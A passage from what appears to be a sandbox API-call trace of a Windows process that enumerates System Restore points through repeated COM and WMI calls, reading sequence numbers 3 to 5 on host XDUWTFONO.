[5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6022f08) returned 0x0 [0121.998] WbemDefPath:IUnknown:AddRef (This=0x6022f08) returned 0x3 [0121.998] WbemDefPath:IUnknown:Release (This=0x6022f08) returned 0x2 [0121.998] WbemDefPath:IWbemPath:SetText (This=0x6022f08, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=3") returned 0x0 [0121.998] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0121.998] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0121.999] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0121.999] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0121.999] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0121.999] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0121.999] IWbemClassObject:Get (in: This=0x6022d70, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389c83c*=0, plFlavor=0x389c840*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), pType=0x389c83c*=19, plFlavor=0x389c840*=0) returned 0x0 [0121.999] IWbemClassObject:Get (in: This=0x6022d70, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389c83c*=19, plFlavor=0x389c840*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x3, varVal2=0x0), pType=0x389c83c*=19, plFlavor=0x389c840*=0) returned 0x0 [0122.010] CoTaskMemAlloc (cb=0x4) returned 0xbb5a08 [0122.010] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbb5a08, puReturned=0x389bfe4 | out: apObjects=0xbb5a08*=0x6022ff0, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.018] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6022ff0) returned 0x0 [0122.021] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.021] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.021] IUnknown:AddRef (This=0x6022ff0) returned 0x3 [0122.021] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.021] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.022] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6022ff4) returned 0x0 [0122.022] IMarshal:GetUnmarshalClass (in: This=0x6022ff4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.022] IUnknown:Release (This=0x6022ff4) returned 0x3 [0122.022] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.022] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.023] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.023] IUnknown:Release (This=0x6022ff0) returned 0x2 [0122.023] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.023] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.023] IUnknown:QueryInterface (in: This=0x6022ff0, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6022ff0) returned 0x0 [0122.025] IUnknown:AddRef (This=0x6022ff0) returned 0x4 [0122.025] IUnknown:Release (This=0x6022ff0) returned 0x3 [0122.025] IUnknown:Release (This=0x6022ff0) returned 0x2 [0122.025] CoTaskMemFree (pv=0xbb5a08) [0122.026] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.026] IUnknown:AddRef (This=0x6022ff0) returned 0x3 [0122.026] IWbemClassObject:Get (in: This=0x6022ff0, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.027] IWbemClassObject:Get (in: This=0x6022ff0, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.027] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4") returned 0x6e [0122.027] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4") returned 0x6e [0122.028] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.030] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.030] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.030] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.033] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x6021090) returned 0x0 [0122.036] WbemDefPath:IUnknown:QueryInterface (in: This=0x6021090, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.036] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6021090, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6023718) returned 0x0 [0122.036] WbemDefPath:IUnknown:Release (This=0x6021090) returned 0x0 [0122.036] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6023718) returned 0x0 [0122.038] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.042] WbemDefPath:IUnknown:AddRef (This=0x6023718) returned 0x3 [0122.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.042] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbb5a08) returned 0x0 [0122.042] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a08, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.042] WbemDefPath:IUnknown:Release (This=0xbb5a08) returned 0x3 [0122.043] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.043] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.043] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee090 | out: ppvObject=0x6ee090*=0x0) returned 0x80004002 [0122.043] WbemDefPath:IUnknown:Release (This=0x6023718) returned 0x2 [0122.043] WbemDefPath:IUnknown:Release (This=0x6023718) returned 0x1 [0122.043] CoGetContextToken (in: pToken=0x6ee988 | out: pToken=0x6ee988) returned 0x0 [0122.043] CoGetContextToken (in: pToken=0x6ee8e8 | out: pToken=0x6ee8e8) returned 0x0 [0122.044] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023718, riid=0x6ee9b8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x6ee9b4 | out: ppvObject=0x6ee9b4*=0x6023718) returned 0x0 [0122.044] WbemDefPath:IUnknown:AddRef (This=0x6023718) returned 0x3 [0122.044] WbemDefPath:IUnknown:Release (This=0x6023718) returned 0x2 [0122.044] WbemDefPath:IWbemPath:SetText (This=0x6023718, uMode=0x4, pszPath="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=4") returned 0x0 [0122.046] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb38 | out: puCount=0x6eeb38*=0x2) returned 0x0 [0122.046] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb34*=0x11, pszText=0x0) returned 0x0 [0122.050] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb34*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb34*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.050] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010bf0, puCount=0x6eeb04 | out: puCount=0x6eeb04*=0x2) returned 0x0 [0122.050] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x0, pszText=0x0 | out: puBuffLength=0x6eeb00*=0x11, pszText=0x0) returned 0x0 [0122.050] WbemDefPath:IWbemPath:GetText (in: This=0x6010bf0, lFlags=4, puBuffLength=0x6eeb00*=0x11, pszText="0000000000000000" | out: puBuffLength=0x6eeb00*=0x11, pszText="\\\\.\\root\\default") returned 0x0 [0122.051] IWbemClassObject:Get (in: This=0x6022ff0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb00*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389d084*=0, plFlavor=0x389d088*=0 | out: pVal=0x6eeb00*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x389d084*=19, plFlavor=0x389d088*=0) returned 0x0 [0122.051] IWbemClassObject:Get (in: This=0x6022ff0, wszName="sequencenumber", lFlags=0, pVal=0x6eeb08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x389d084*=19, plFlavor=0x389d088*=0 | out: pVal=0x6eeb08*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x4, varVal2=0x0), pType=0x389d084*=19, plFlavor=0x389d088*=0) returned 0x0 [0122.052] CoTaskMemAlloc (cb=0x4) returned 0xbb5a48 [0122.053] IEnumWbemClassObject:Next (in: This=0x6022d34, lTimeout=-1, uCount=0x1, apObjects=0xbb5a48, puReturned=0x389bfe4 | out: apObjects=0xbb5a48*=0x6023800, puReturned=0x389bfe4*=0x1) returned 0x0 [0122.065] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee170 | out: ppvObject=0x6ee170*=0x6023800) returned 0x0 [0122.066] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee12c | out: ppvObject=0x6ee12c*=0x0) returned 0x80004002 [0122.066] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6edf4c | out: ppvObject=0x6edf4c*=0x0) returned 0x80004002 [0122.066] IUnknown:AddRef (This=0x6023800) returned 0x3 [0122.066] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6eda8c | out: ppvObject=0x6eda8c*=0x0) returned 0x80004002 [0122.066] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6eda3c | out: ppvObject=0x6eda3c*=0x0) returned 0x80004002 [0122.067] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6eda48 | out: ppvObject=0x6eda48*=0x6023804) returned 0x0 [0122.067] IMarshal:GetUnmarshalClass (in: This=0x6023804, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6eda50 | out: pCid=0x6eda50*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0122.067] IUnknown:Release (This=0x6023804) returned 0x3 [0122.067] CoGetContextToken (in: pToken=0x6edaa8 | out: pToken=0x6edaa8) returned 0x0 [0122.067] CoGetContextToken (in: pToken=0x6edeb0 | out: pToken=0x6edeb0) returned 0x0 [0122.067] IUnknown:QueryInterface (in: This=0x6023800, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edf40 | out: ppvObject=0x6edf40*=0x0) returned 0x80004002 [0122.067] IUnknown:Release (This=0x6023800) returned 0x2 [0122.070] CoGetContextToken (in: pToken=0x6ee480 | out: pToken=0x6ee480) returned 0x0 [0122.070] CoGetContextToken (in: pToken=0x6ee3e0 | out: pToken=0x6ee3e0) returned 0x0 [0122.070] IUnknown:QueryInterface (in: This=0x6023800, riid=0x6ee4b0*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x6ee4ac | out: ppvObject=0x6ee4ac*=0x6023800) returned 0x0 [0122.070] IUnknown:AddRef (This=0x6023800) returned 0x4 [0122.070] IUnknown:Release (This=0x6023800) returned 0x3 [0122.071] IUnknown:Release (This=0x6023800) returned 0x2 [0122.071] CoTaskMemFree (pv=0xbb5a48) [0122.071] CoGetContextToken (in: pToken=0x6ee7e8 | out: pToken=0x6ee7e8) returned 0x0 [0122.071] IUnknown:AddRef (This=0x6023800) returned 0x3 [0122.071] IWbemClassObject:Get (in: This=0x6023800, wszName="__GENUS", lFlags=0, pVal=0x6eeafc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb7c*=0, plFlavor=0x6eeb78*=0 | out: pVal=0x6eeafc*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x6eeb7c*=3, plFlavor=0x6eeb78*=64) returned 0x0 [0122.071] IWbemClassObject:Get (in: This=0x6023800, wszName="__PATH", lFlags=0, pVal=0x6eeae0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x6eeb64*=0, plFlavor=0x6eeb60*=0 | out: pVal=0x6eeae0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5", varVal2=0x0), pType=0x6eeb64*=8, plFlavor=0x6eeb60*=64) returned 0x0 [0122.072] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5") returned 0x6e [0122.076] SysStringByteLen (bstr="\\\\XDUWTFONO\\root\\default:SystemRestore.SequenceNumber=5") returned 0x6e [0122.076] CoGetObjectContext (in: riid=0x34d7b34*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6eeb0c | out: ppv=0x6eeb0c*=0xb51e34) returned 0x0 [0122.076] IComThreadingInfo:GetCurrentApartmentType (in: This=0xb51e34, pAptType=0x6eeb04 | out: pAptType=0x6eeb04*=1) returned 0x0 [0122.076] IUnknown:QueryInterface (in: This=0xb51e34, riid=0x34d7b1c*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x6eeb08 | out: ppvObject=0x6eeb08*=0x0) returned 0x80004002 [0122.077] IUnknown:Release (This=0xb51e34) returned 0x1 [0122.079] CoGetClassObject (in: rclsid=0xb594e4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x6ee478 | out: ppv=0x6ee478*=0x60210a0) returned 0x0 [0122.079] WbemDefPath:IUnknown:QueryInterface (in: This=0x60210a0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x6ee690 | out: ppvObject=0x6ee690*=0x0) returned 0x80004002 [0122.079] WbemDefPath:IClassFactory:CreateInstance (in: This=0x60210a0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee6a4 | out: ppvObject=0x6ee6a4*=0x6023a60) returned 0x0 [0122.082] WbemDefPath:IUnknown:Release (This=0x60210a0) returned 0x0 [0122.082] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ee2c4 | out: ppvObject=0x6ee2c4*=0x6023a60) returned 0x0 [0122.088] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x6ee280 | out: ppvObject=0x6ee280*=0x0) returned 0x80004002 [0122.088] WbemDefPath:IUnknown:AddRef (This=0x6023a60) returned 0x3 [0122.089] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x6edbdc | out: ppvObject=0x6edbdc*=0x0) returned 0x80004002 [0122.089] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x6edb8c | out: ppvObject=0x6edb8c*=0x0) returned 0x80004002 [0122.089] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6edb98 | out: ppvObject=0x6edb98*=0xbb5a48) returned 0x0 [0122.090] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0xbb5a48, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x6edba0 | out: pCid=0x6edba0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0122.090] WbemDefPath:IUnknown:Release (This=0xbb5a48) returned 0x3 [0122.090] CoGetContextToken (in: pToken=0x6edbf8 | out: pToken=0x6edbf8) returned 0x0 [0122.090] CoGetContextToken (in: pToken=0x6ee000 | out: pToken=0x6ee000) returned 0x0 [0122.090] WbemDefPath:IUnknown:QueryInterface (in: This=0x6023a60, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, 